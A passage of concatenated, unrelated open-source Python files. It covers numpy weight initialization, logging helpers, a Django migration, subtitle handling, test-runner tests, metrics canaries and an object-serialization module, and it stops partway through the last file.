"""Module that contains functionality to initialize parameters to starting
values."""
from __future__ import absolute_import
import random
import numpy as np
from . import mathadapt as ma
from .compat import range
def sparsify_columns(arr, n_non_zero, keep_diagonal=False, random_state=None):
"""Set all but ``n_non_zero`` entries to zero for each column of ``arr``.
This is a common technique to find better starting points for learning
deep and/or recurrent networks.
Parameters
----------
arr : array_like, two dimensional
Array to work upon in place.
n_non_zero : integer
Amount of non zero entries to keep.
keep_diagonal : boolean, optional [default: False]
If set to True and ``arr`` is square, do keep the diagonal.
random_state : numpy.random.RandomState object, optional [default : None]
If set, random number generator that will generate the indices
corresponding to the zero-valued columns.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import sparsify_columns
>>> arr = np.arange(9).reshape((3, 3))
>>> sparsify_columns(arr, 1)
>>> arr # doctest: +SKIP
array([[0, 0, 0],
[0, 4, 5],
[6, 0, 0]])
"""
colsize = arr.shape[0]
# In case it's gnumpy, copy to numpy array first. The sparsifying loop will
# run in numpy.
arr_np = arr if isinstance(arr, np.ndarray) else arr.as_numpy_array()
mask = np.ones_like(arr_np)
for i in range(arr.shape[1]):
idxs = range(colsize)
if random_state is None:
zeros = random.sample(idxs, colsize - n_non_zero)
else:
zeros = random_state.choice(idxs, colsize - n_non_zero,
replace=False)
mask[zeros, i] *= 0
if keep_diagonal and arr.shape[0] == arr.shape[1]:
mask += np.eye(arr.shape[0])
arr *= mask
def bound_spectral_radius(arr, bound=1.2):
"""Set the spectral radius of the square matrix ``arr`` to ``bound``.
This is performed by scaling eigenvalues of ``arr``.
Parameters
----------
arr : array_like, two dimensional
Array to work upon in place.
bound : float, optional, default: 1.2
Examples
--------
>>> import numpy as np
>>> from climin.initialize import bound_spectral_radius
>>> arr = np.arange(9).reshape((3, 3)).astype('float64')
>>> bound_spectral_radius(arr, 1.1)
>>> arr # doctest: +SKIP
array([[ -7.86816957e-17, 8.98979486e-02, 1.79795897e-01],
[ 2.69693846e-01, 3.59591794e-01, 4.49489743e-01],
[ 5.39387691e-01, 6.29285640e-01, 7.19183588e-01]])
"""
spectral_radius = abs(np.linalg.eigvals(ma.assert_numpy(arr))).max()
arr[...] *= bound / spectral_radius
def orthogonal(arr, shape=None):
"""Initialize the tensor ''arr'' with random orthogonal matrices
This is performed by QR decomposition of random matrices and
setting parts of ''arr'' to Q.
Q is an orthogonal matrix only iff parts of ``arr`` are square, i.e.,
arr[..., :, :] is square or ''shape'' is that of a square matrix.
Otherwise either rows or columns of Q are orthogonal, but not both.
Parameters
----------
arr : tensor_like, n-dimensional
Tensor to work upon in place.
shape : 2-tuple optional, default: None
If len(arr.shape) != 2 or if it is not square, it is required to
        specify the shape of matrices that comprise ``arr``.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import orthogonal
>>> arr = np.empty((3, 3))
>>> orthogonal(arr)
>>> arr # doctest: +SKIP
array([[-0.44670617 -0.88694894 0.11736768]
[ 0.08723642 -0.17373873 -0.98092031]
[ 0.89041755 -0.42794442 0.15498441]]
>>> arr = np.empty((3, 4, 1))
>>> orthogonal(arr, shape=(2, 2))
>>> arr.reshape((3, 2, 2)) # doctest: +SKIP
array([[[-0.81455859 0.58008129]
[ 0.58008129 0.81455859]]
[[-0.75214632 -0.65899614]
[-0.65899614 0.75214632]]
[[-0.97017102 -0.24242153]
[-0.24242153 0.97017102]]])
"""
if shape is not None:
d1, d2 = shape
elif len(arr.shape) >= 2:
d1, d2 = arr.shape[-2:]
else:
raise ValueError('Cannot ortho-initialize vectors. Please specify shape')
    shape = (arr.size // d1 // d2, d1, d2)
if shape[0] == 1 and d1 == 1 or d2 == 1:
raise ValueError('Cannot ortho-initialize vectors.')
if np.prod(shape) != arr.size:
raise ValueError('Invalid shape')
samples = np.random.randn(*shape)
for i, sample in enumerate(samples):
if d2 > d1:
samples[i, ...] = np.linalg.qr(sample.T)[0].T
else:
samples[i, ...] = np.linalg.qr(sample)[0]
arr[...] = samples.reshape(arr.shape)
def randomize_normal(arr, loc=0, scale=1, random_state=None):
"""Populate an array with random numbers from a normal distribution with
mean `loc` and standard deviation `scale`.
Parameters
----------
arr : array_like
Array to work upon in place.
loc : float
Mean of the random numbers.
scale : float
Standard deviation of the random numbers.
random_state : np.random.RandomState object, optional [default : None]
Random number generator that shall generate the random numbers.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import randomize_normal
>>> arr = np.empty((3, 3))
>>> randomize_normal(arr)
>>> arr # doctest: +SKIP
array([[ 0.18076413, 0.60880657, 1.20855691],
[ 1.7799948 , -0.82565481, 0.53875307],
[-0.67056028, -1.46257419, 1.17033425]])
>>> randomize_normal(arr, 10, 0.1)
>>> arr # doctest: +SKIP
array([[ 10.02221481, 10.0982449 , 10.02495358],
[ 9.99867829, 9.99410111, 9.8242318 ],
[ 9.9383779 , 9.94880091, 10.03179085]])
"""
rng = np.random if random_state is None else random_state
sample = rng.normal(loc, scale, arr.shape)
if isinstance(arr, np.ndarray):
arr[...] = sample.astype(arr.dtype)
else:
# Assume gnumpy.
arr[:] = sample.astype('float32')
|
isegm/utils/log.py | XavierCHEN34/ClickSEG | 278 | 11187274 | import io
import time
import logging
from datetime import datetime
import numpy as np
from torch.utils.tensorboard import SummaryWriter
LOGGER_NAME = 'root'
LOGGER_DATEFMT = '%Y-%m-%d %H:%M:%S'
handler = logging.StreamHandler()
logger = logging.getLogger(LOGGER_NAME)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
def add_logging(logs_path, prefix):
log_name = prefix + datetime.strftime(datetime.today(), '%Y-%m-%d_%H-%M-%S') + '.log'
stdout_log_path = logs_path / log_name
fh = logging.FileHandler(str(stdout_log_path))
formatter = logging.Formatter(fmt='(%(levelname)s) %(asctime)s: %(message)s',
datefmt=LOGGER_DATEFMT)
fh.setFormatter(formatter)
logger.addHandler(fh)
class TqdmToLogger(io.StringIO):
logger = None
level = None
buf = ''
def __init__(self, logger, level=None, mininterval=5):
super(TqdmToLogger, self).__init__()
self.logger = logger
self.level = level or logging.INFO
self.mininterval = mininterval
self.last_time = 0
def write(self, buf):
self.buf = buf.strip('\r\n\t ')
def flush(self):
if len(self.buf) > 0 and time.time() - self.last_time > self.mininterval:
self.logger.log(self.level, self.buf)
self.last_time = time.time()
class SummaryWriterAvg(SummaryWriter):
def __init__(self, *args, dump_period=20, **kwargs):
super().__init__(*args, **kwargs)
self._dump_period = dump_period
self._avg_scalars = dict()
def add_scalar(self, tag, value, global_step=None, disable_avg=False):
if disable_avg or isinstance(value, (tuple, list, dict)):
super().add_scalar(tag, np.array(value), global_step=global_step)
else:
if tag not in self._avg_scalars:
self._avg_scalars[tag] = ScalarAccumulator(self._dump_period)
avg_scalar = self._avg_scalars[tag]
avg_scalar.add(value)
if avg_scalar.is_full():
super().add_scalar(tag, avg_scalar.value,
global_step=global_step)
avg_scalar.reset()
class ScalarAccumulator(object):
def __init__(self, period):
self.sum = 0
self.cnt = 0
self.period = period
def add(self, value):
self.sum += value
self.cnt += 1
@property
def value(self):
if self.cnt > 0:
return self.sum / self.cnt
else:
return 0
def reset(self):
self.cnt = 0
self.sum = 0
def is_full(self):
return self.cnt >= self.period
def __len__(self):
return self.cnt
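# Illustrative usage sketch, not part of the original module; the log directory,
# tag name and `losses` iterable below are examples only. SummaryWriterAvg
# accumulates scalars and writes their running average every `dump_period` calls:
#
#     sw = SummaryWriterAvg(log_dir='./runs/example', dump_period=10)
#     for step, loss_value in enumerate(losses):
#         sw.add_scalar('losses/train', loss_value, global_step=step)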
|
common/migrations/0034_auto_20210913_1918.py | jordanm88/Django-CRM | 1,334 | 11187288 | <filename>common/migrations/0034_auto_20210913_1918.py
# Generated by Django 3.2 on 2021-09-13 13:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
('common', '0033_alter_user_alternate_email'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='user',
),
migrations.RemoveField(
model_name='google',
name='user',
),
migrations.RemoveField(
model_name='user',
name='address',
),
migrations.RemoveField(
model_name='user',
name='alternate_phone',
),
migrations.RemoveField(
model_name='user',
name='has_marketing_access',
),
migrations.RemoveField(
model_name='user',
name='has_sales_access',
),
migrations.RemoveField(
model_name='user',
name='is_admin',
),
migrations.RemoveField(
model_name='user',
name='phone',
),
migrations.RemoveField(
model_name='user',
name='role',
),
migrations.AddField(
model_name='apisettings',
name='company',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='common.company'),
),
migrations.AddField(
model_name='comment',
name='profile',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comments', to='common.profile'),
),
migrations.AddField(
model_name='document',
name='company',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='common.company'),
),
migrations.AddField(
model_name='google',
name='profile',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='google', to='common.profile'),
),
migrations.AddField(
model_name='profile',
name='address',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='adress_users', to='common.address'),
),
migrations.AddField(
model_name='profile',
name='alternate_phone',
field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, region=None),
),
migrations.AddField(
model_name='profile',
name='company',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='common.company'),
),
migrations.AddField(
model_name='profile',
name='date_of_joining',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='profile',
name='has_marketing_access',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='has_sales_access',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='is_active',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='profile',
name='is_organization_admin',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='phone',
field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, region=None, unique=True),
),
migrations.AddField(
model_name='profile',
name='role',
field=models.CharField(choices=[('ADMIN', 'ADMIN'), ('USER', 'USER')], default='USER', max_length=50),
),
migrations.AlterField(
model_name='apisettings',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='settings_created_by', to='common.profile'),
),
migrations.AlterField(
model_name='apisettings',
name='lead_assigned_to',
field=models.ManyToManyField(related_name='lead_assignee_users', to='common.Profile'),
),
migrations.AlterField(
model_name='attachments',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='attachment_created_by', to='common.profile'),
),
migrations.AlterField(
model_name='comment',
name='commented_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='common.profile'),
),
migrations.AlterField(
model_name='company',
name='sub_domain',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='document',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='document_uploaded', to='common.profile'),
),
migrations.AlterField(
model_name='document',
name='shared_to',
field=models.ManyToManyField(related_name='document_shared_to', to='common.Profile'),
),
migrations.AlterField(
model_name='profile',
name='activation_key',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='profile',
name='key_expires',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='profile',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterUniqueTogether(
name='profile',
unique_together={('user', 'company')},
),
]
|
python/ql/test/query-tests/Security/lib/twisted/web/resource.py | vadi2/codeql | 4,036 | 11187329 | <gh_stars>1000+
class Resource(object):
pass
|
subliminal/subtitle.py | jtwill/subliminal | 152 | 11187346 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
import os.path
import babelfish
import chardet
import guessit.matchtree
import guessit.transfo
import pysrt
from .video import Episode, Movie
logger = logging.getLogger(__name__)
class Subtitle(object):
"""Base class for subtitle
:param language: language of the subtitle
:type language: :class:`babelfish.Language`
:param bool hearing_impaired: `True` if the subtitle is hearing impaired, `False` otherwise
:param page_link: link to the web page from which the subtitle can be downloaded, if any
:type page_link: string or None
"""
def __init__(self, language, hearing_impaired=False, page_link=None):
self.language = language
self.hearing_impaired = hearing_impaired
self.page_link = page_link
#: Content as bytes
self.content = None
#: Encoding to decode with when accessing :attr:`text`
self.encoding = None
@property
def guessed_encoding(self):
"""Guessed encoding using the language, falling back on chardet"""
# always try utf-8 first
encodings = ['utf-8']
# add language-specific encodings
if self.language.alpha3 == 'zho':
encodings.extend(['gb18030', 'big5'])
elif self.language.alpha3 == 'jpn':
encodings.append('shift-jis')
elif self.language.alpha3 == 'ara':
encodings.append('windows-1256')
elif self.language.alpha3 == 'heb':
encodings.append('windows-1255')
elif self.language.alpha3 == 'tur':
encodings.extend(['iso-8859-9', 'windows-1254'])
elif self.language.alpha3 == 'pol':
# Eastern European Group 1
encodings.extend(['windows-1250'])
elif self.language.alpha3 == 'bul':
# Eastern European Group 2
encodings.extend(['windows-1251'])
else:
# Western European (windows-1252)
encodings.append('latin-1')
# try to decode
for encoding in encodings:
try:
self.content.decode(encoding)
return encoding
except UnicodeDecodeError:
pass
# fallback on chardet
logger.warning('Could not decode content with encodings %r', encodings)
return chardet.detect(self.content)['encoding']
@property
def text(self):
"""Content as string
If :attr:`encoding` is None, the encoding is guessed with :attr:`guessed_encoding`
"""
if not self.content:
return ''
return self.content.decode(self.encoding or self.guessed_encoding, errors='replace')
@property
def is_valid(self):
"""Check if a subtitle text is a valid SubRip format"""
try:
pysrt.from_string(self.text, error_handling=pysrt.ERROR_RAISE)
return True
except pysrt.Error as e:
if e.args[0] > 80:
return True
except:
logger.exception('Unexpected error when validating subtitle')
return False
def compute_matches(self, video):
"""Compute the matches of the subtitle against the `video`
:param video: the video to compute the matches against
:type video: :class:`~subliminal.video.Video`
:return: matches of the subtitle
:rtype: set
"""
raise NotImplementedError
def compute_score(self, video):
"""Compute the score of the subtitle against the `video`
There are equivalent matches so that a provider can match one element or its equivalent. This is
        to give all providers a chance to have a score in the same range without hurting quality.
* Matching :class:`~subliminal.video.Video`'s `hashes` is equivalent to matching everything else
* Matching :class:`~subliminal.video.Episode`'s `season` and `episode`
is equivalent to matching :class:`~subliminal.video.Episode`'s `title`
* Matching :class:`~subliminal.video.Episode`'s `tvdb_id` is equivalent to matching
:class:`~subliminal.video.Episode`'s `series`
:param video: the video to compute the score against
:type video: :class:`~subliminal.video.Video`
:return: score of the subtitle
:rtype: int
"""
score = 0
# compute matches
initial_matches = self.compute_matches(video)
matches = initial_matches.copy()
# hash is the perfect match
if 'hash' in matches:
score = video.scores['hash']
else:
# remove equivalences
if isinstance(video, Episode):
if 'imdb_id' in matches:
matches -= {'series', 'tvdb_id', 'season', 'episode', 'title', 'year'}
if 'tvdb_id' in matches:
matches -= {'series', 'year'}
if 'title' in matches:
matches -= {'season', 'episode'}
# add other scores
score += sum((video.scores[match] for match in matches))
logger.info('Computed score %d with matches %r', score, initial_matches)
return score
def __repr__(self):
return '<%s [%s]>' % (self.__class__.__name__, self.language)
def get_subtitle_path(video_path, language=None):
"""Create the subtitle path from the given `video_path` and `language`
:param string video_path: path to the video
:param language: language of the subtitle to put in the path
:type language: :class:`babelfish.Language` or None
:return: path of the subtitle
:rtype: string
"""
subtitle_path = os.path.splitext(video_path)[0]
if language is not None:
try:
return subtitle_path + '.%s.%s' % (language.alpha2, 'srt')
except babelfish.LanguageConvertError:
return subtitle_path + '.%s.%s' % (language.alpha3, 'srt')
return subtitle_path + '.srt'
def compute_guess_matches(video, guess):
"""Compute matches between a `video` and a `guess`
:param video: the video to compute the matches on
:type video: :class:`~subliminal.video.Video`
:param guess: the guess to compute the matches on
:type guess: :class:`guessit.Guess`
:return: matches of the `guess`
:rtype: set
"""
matches = set()
if isinstance(video, Episode):
# series
if video.series and 'series' in guess and guess['series'].lower() == video.series.lower():
matches.add('series')
# season
if video.season and 'seasonNumber' in guess and guess['seasonNumber'] == video.season:
matches.add('season')
# episode
if video.episode and 'episodeNumber' in guess and guess['episodeNumber'] == video.episode:
matches.add('episode')
# year
if video.year == guess.get('year'): # count "no year" as an information
matches.add('year')
elif isinstance(video, Movie):
# year
if video.year and 'year' in guess and guess['year'] == video.year:
matches.add('year')
# title
if video.title and 'title' in guess and guess['title'].lower() == video.title.lower():
matches.add('title')
# release group
if video.release_group and 'releaseGroup' in guess and guess['releaseGroup'].lower() == video.release_group.lower():
matches.add('release_group')
# screen size
if video.resolution and 'screenSize' in guess and guess['screenSize'] == video.resolution:
matches.add('resolution')
# format
if video.format and 'format' in guess and guess['format'].lower() == video.format.lower():
matches.add('format')
# video codec
if video.video_codec and 'videoCodec' in guess and guess['videoCodec'] == video.video_codec:
matches.add('video_codec')
# audio codec
if video.audio_codec and 'audioCodec' in guess and guess['audioCodec'] == video.audio_codec:
matches.add('audio_codec')
return matches
def compute_guess_properties_matches(video, string, propertytype):
"""Compute matches between a `video` and properties of a certain property type
:param video: the video to compute the matches on
:type video: :class:`~subliminal.video.Video`
:param string string: the string to check for a certain property type
:param string propertytype: the type of property to check (as defined in guessit)
:return: matches of a certain property type (but will only be 1 match because we are checking for 1 property type)
:rtype: set
Supported property types: result of guessit.transfo.guess_properties.GuessProperties().supported_properties()
[u'audioProfile',
u'videoCodec',
u'container',
u'format',
u'episodeFormat',
u'videoApi',
u'screenSize',
u'videoProfile',
u'audioChannels',
u'other',
u'audioCodec']
"""
matches = set()
# We only check for the property types relevant for us
if propertytype == 'screenSize' and video.resolution:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.resolution.lower():
matches.add('resolution')
elif propertytype == 'format' and video.format:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.format.lower():
matches.add('format')
elif propertytype == 'videoCodec' and video.video_codec:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.video_codec.lower():
matches.add('video_codec')
elif propertytype == 'audioCodec' and video.audio_codec:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.audio_codec.lower():
matches.add('audio_codec')
return matches
def guess_properties(string, propertytype):
properties = set()
if string:
tree = guessit.matchtree.MatchTree(string)
guessit.transfo.guess_properties.GuessProperties().process(tree)
properties = set(n.guess[propertytype] for n in tree.nodes() if propertytype in n.guess)
return properties
def fix_line_endings(content):
"""Fix line ending of `content` by changing it to \n
:param bytes content: content of the subtitle
:return: the content with fixed line endings
:rtype: bytes
"""
return content.replace(b'\r\n', b'\n').replace(b'\r', b'\n')
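if __name__ == '__main__':
    # Illustrative sketch, not part of the original module: fix_line_endings
    # normalizes CRLF and lone CR byte sequences to LF.
    assert fix_line_endings(b'line1\r\nline2\rline3\n') == b'line1\nline2\nline3\n'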
|
koalixcrm/djangoUserExtension/user_extension/text_paragraph.py | Cataldir/koalixcrm | 290 | 11187380 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib import admin
from django.utils.translation import ugettext as _
from koalixcrm.crm.const.purpose import *
class TextParagraphInDocumentTemplate(models.Model):
document_template = models.ForeignKey("djangoUserExtension.DocumentTemplate")
purpose = models.CharField(verbose_name=_("Purpose"), max_length=2, choices=PURPOSESTEXTPARAGRAPHINDOCUMENTS)
text_paragraph = models.TextField(verbose_name=_("Text"), blank=False, null=False)
class Meta:
app_label = "crm"
verbose_name = _('TextParagraphInDocumentTemplate')
verbose_name_plural = _('TextParagraphInDocumentTemplates')
def __str__(self):
return str(self.id)
class InlineTextParagraph(admin.TabularInline):
model = TextParagraphInDocumentTemplate
extra = 1
classes = ('collapse-open',)
fieldsets = (
(_('Basics'), {
'fields': ('purpose', 'text_paragraph',)
}),
)
allow_add = True |
astropy/tests/tests/test_runner.py | jayvdb/astropy | 445 | 11187383 | <filename>astropy/tests/tests/test_runner.py<gh_stars>100-1000
import pytest
# Renamed these imports so that them being in the namespace will not
# cause pytest 3 to discover them as tests and then complain that
# they have __init__ defined.
from astropy.tests.runner import TestRunner as _TestRunner
from astropy.tests.runner import TestRunnerBase as _TestRunnerBase
from astropy.tests.runner import keyword
def test_disable_kwarg():
class no_remote_data(_TestRunner):
@keyword()
def remote_data(self, remote_data, kwargs):
return NotImplemented
r = no_remote_data('.')
with pytest.raises(TypeError):
r.run_tests(remote_data='bob')
def test_wrong_kwarg():
r = _TestRunner('.')
with pytest.raises(TypeError):
r.run_tests(spam='eggs')
def test_invalid_kwarg():
class bad_return(_TestRunnerBase):
@keyword()
def remote_data(self, remote_data, kwargs):
return 'bob'
r = bad_return('.')
with pytest.raises(TypeError):
r.run_tests(remote_data='bob')
def test_new_kwarg():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
return [spam]
r = Spam('.')
args = r._generate_args(spam='spam')
assert ['spam'] == args
def test_priority():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
return [spam]
@keyword(priority=1)
def eggs(self, eggs, kwargs):
return [eggs]
r = Spam('.')
args = r._generate_args(spam='spam', eggs='eggs')
assert ['eggs', 'spam'] == args
def test_docs():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
"""
Spam Spam Spam
"""
return [spam]
@keyword()
def eggs(self, eggs, kwargs):
"""
eggs asldjasljd
"""
return [eggs]
r = Spam('.')
assert "eggs" in r.run_tests.__doc__
assert "Spam Spam Spam" in r.run_tests.__doc__
|
corehq/tabs/extension_points.py | dimagilg/commcare-hq | 471 | 11187411 | from typing import List, Tuple
from corehq.extensions import extension_point, ResultFormat
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_dropdown_items(tab_name, tab, domain, request) -> List[dict]:
"""Add dropdown items to UI Tabs.
Parameters:
:param tab_name: Name of the tab that items will be added to
:param tab: The tab instance
:param domain: The domain of the current request
:param request: The current request
Returns:
        A list of dicts, each with the following keys:
* title
* url (default=None)
* html (default=None)
* is_header (default=False)
* is_divider (default=False)
* data_id (default=None)
"""
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_sidebar_items(tab_name, tab, domain, request) -> List[Tuple[str, List[dict]]]:
"""Add sidebar items to UI tabs.
Parameters:
:param tab_name: Name of the UI Tab
:param tab: The tab instance
:param domain: The domain name
:param request: The request object
Returns:
A list of tuples: Tuple[header_text, List[dict]]. The dictionaries must have
the following keys:
* title: Link text
* url: relative URL for the UI
* icon: Link icon
* show_in_dropdown (optional): boolean
"""
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_classes():
"""Add custom tabs to the top navigation
Parameters:
None
Returns:
List of UITab subclasses
"""
|
norminette/lexer/__init__.py | kohkubo/norminette | 460 | 11187430 | from norminette.lexer.lexer import Lexer
from norminette.lexer.lexer import TokenError
from norminette.lexer.tokens import Token
__all__ = ["Lexer", "TokenError", "Token"]
|
convert_labels.py | QzAnsel/Person-Segmentation-Keras | 155 | 11187461 | <reponame>QzAnsel/Person-Segmentation-Keras<gh_stars>100-1000
import os
import cv2
from tqdm import tqdm
import argparse
parse = argparse.ArgumentParser()
parse.add_argument('--img-path', type=str, default='')
parse.add_argument('--save-path', type=str, default='')
parse.add_argument('--mode', type=str, default='segmentation')
args = parse.parse_args()
data_path = args.img_path
save_path = args.save_path
limgs = os.listdir(data_path)
pd = tqdm(total=17706)
if args.mode == 'segmentation':
for item in limgs:
pd.update(1)
im = cv2.imread(data_path + item)
im[im != 0] = 1
cv2.imwrite(save_path + item, im)
else:
for item in limgs:
pd.update(1)
im = cv2.imread(data_path + item)
im[im == 1] = 1
im[im == 2] = 1
im[im == 3] = 1
im[im == 17] = 1
im[im == 11] = 1
im[im == 4] = 2
im[im == 14] = 3
im[im == 15] = 3
im[im == 5] = 4
im[im == 6] = 4
im[im == 7] = 4
im[im == 8] = 4
im[im == 9] = 4
im[im == 10] = 4
im[im == 12] = 4
im[im == 13] = 4
im[im == 16] = 0
cv2.imwrite(save_path + item, im)
pd.close()
|
tests/utils.py | projectoriented/tools | 142 | 11187464 | <filename>tests/utils.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Helper functions for tests
"""
import functools
import tempfile
def with_temporary_folder(func):
"""
    Call the decorated function under the tempfile.TemporaryDirectory
context manager. Pass the temporary directory name to the decorated
function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with tempfile.TemporaryDirectory() as tmpdirname:
return func(*args, tmpdirname, **kwargs)
return wrapper
def with_temporary_file(func):
"""
    Call the decorated function under the tempfile.NamedTemporaryFile
context manager. Pass the opened file handle to the decorated function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with tempfile.NamedTemporaryFile() as tmpfile:
return func(*args, tmpfile, **kwargs)
return wrapper
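# Illustrative usage (not part of the original helpers): each decorator appends the
# temporary resource as an extra positional argument, e.g.
#
#     @with_temporary_folder
#     def test_build(self, tmp_dir):
#         ...  # tmp_dir is the temporary directory path
#
#     @with_temporary_file
#     def test_write(self, tmp_file):
#         ...  # tmp_file is the open NamedTemporaryFile handle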
|
examples/bench/django/templatetags/bench.py | LordAro/mako | 207 | 11187496 | <reponame>LordAro/mako<gh_stars>100-1000
from django.template import Library, Node, resolve_variable
from django.utils.html import escape
register = Library()
def greeting(name):
return "Hello, %s!" % escape(name)
greeting = register.simple_tag(greeting)
|
tests/canary/agent/canary.py | 02strich/aws-embedded-metrics-python | 130 | 11187502 | <reponame>02strich/aws-embedded-metrics-python
import asyncio
import aws_embedded_metrics
from aws_embedded_metrics import metric_scope
from aws_embedded_metrics.config import get_config
from getversion import get_module_version
import os
import psutil
import time
import logging
log = logging.getLogger(__name__)
version, _ = get_module_version(aws_embedded_metrics)
Config = get_config()
Config.log_group_name = '/Canary/Python/CloudWatchAgent/Metrics'
process = psutil.Process(os.getpid())
@metric_scope
async def app(init, last_run_duration, metrics):
if init:
metrics.put_metric('Init', 1, 'Count')
init = False
metrics.set_namespace('Canary')
metrics.set_dimensions({"Runtime": 'Python', "Platform": 'ECS', "Agent": 'CloudWatchAgent', "Version": version})
metrics.put_metric('Invoke', 1, "Count")
metrics.put_metric('Duration', last_run_duration, 'Seconds')
metrics.put_metric('Memory.RSS', process.memory_info().rss, 'Bytes')
async def main():
init = True
duration = None
# wait for agent to start
# TODO: this should not be needed if we're using a ring buffer to queue and re-try events
await asyncio.sleep(10)
while True:
# capture the approximate run time of the method
last_run_at = time.time_ns()
await app(init, duration)
duration = time.time_ns() - last_run_at
await asyncio.sleep(0.2)
init = False
asyncio.run(main())
|
src/related/functions.py | RodrigoDeRosa/related | 190 | 11187526 | from __future__ import absolute_import, division, print_function
from collections import OrderedDict
from enum import Enum
import yaml
import json
from attr._make import fields
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
@singledispatch
def to_dict(obj, **kwargs):
"""
    Convert an object into a dictionary. Uses singledispatch to allow for
clean extensions for custom class types.
Reference: https://pypi.python.org/pypi/singledispatch
:param obj: object instance
:param kwargs: keyword arguments such as suppress_private_attr,
suppress_empty_values, dict_factory
:return: converted dictionary.
"""
# if is_related, then iterate attrs.
if is_model(obj.__class__):
return related_obj_to_dict(obj, **kwargs)
# else, return obj directly. register a custom to_dict if you need to!
# reference: https://pypi.python.org/pypi/singledispatch
else:
return obj
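# Illustrative sketch (not part of the original module): because to_dict is a
# singledispatch function, custom types can register their own converters,
# e.g. assuming `from datetime import datetime` is imported:
#
#     @to_dict.register(datetime)
#     def _(obj, **kwargs):
#         return obj.isoformat()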
def related_obj_to_dict(obj, **kwargs):
""" Covert a known related object to a dictionary. """
# Explicitly discard formatter kwarg, should not be cascaded down.
kwargs.pop('formatter', None)
# If True, remove fields that start with an underscore (e.g. _secret)
suppress_private_attr = kwargs.get("suppress_private_attr", False)
# if True, don't store fields with None values into dictionary.
suppress_empty_values = kwargs.get("suppress_empty_values", False)
# get list of attrs fields
attrs = fields(obj.__class__)
# instantiate return dict, use OrderedDict type by default
return_dict = kwargs.get("dict_factory", OrderedDict)()
for a in attrs:
# skip if private attr and flag tells you to skip
if suppress_private_attr and a.name.startswith("_"):
continue
metadata = a.metadata or {}
# formatter is a related-specific `attrs` meta field
# see fields.DateField
formatter = metadata.get('formatter')
# get value and call to_dict on it, passing the kwargs/formatter
value = getattr(obj, a.name)
value = to_dict(value, formatter=formatter, **kwargs)
# check flag, skip None values
if suppress_empty_values and value is None:
continue
# field name can be overridden by the metadata field
key_name = a.metadata.get('key') or a.name
# store converted / formatted value into return dictionary
return_dict[key_name] = value
return return_dict
def to_model(cls, value):
"""
Coerce a value into a model object based on a class-type (cls).
:param cls: class type to coerce into
:param value: value to be coerced
:return: original value or coerced value (value')
"""
if isinstance(value, cls) or value is None:
pass # skip if right type or value is None
elif issubclass(cls, Enum):
value = cls(value)
elif is_model(cls) and isinstance(value, dict):
value = convert_key_to_attr_names(cls, value)
value = cls(**value)
else:
value = cls(value)
return value
def convert_key_to_attr_names(cls, original):
""" convert key names to their corresponding attribute names """
attrs = fields(cls)
updated = {}
keys_pulled = set()
for a in attrs:
key_name = a.metadata.get('key') or a.name
if key_name in original:
updated[a.name] = original.get(key_name)
keys_pulled.add(key_name)
if getattr(cls, '__related_strict__', False):
extra = set(original.keys()) - keys_pulled
if len(extra):
raise ValueError("Extra keys (strict mode): {}".format(extra))
return updated
def is_model(cls):
"""
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: :class:`bool`
"""
return getattr(cls, "__attrs_attrs__", None) is not None
def to_yaml(obj, stream=None, dumper_cls=yaml.Dumper, default_flow_style=False,
**kwargs):
"""
Serialize a Python object into a YAML stream with OrderedDict and
default_flow_style defaulted to False.
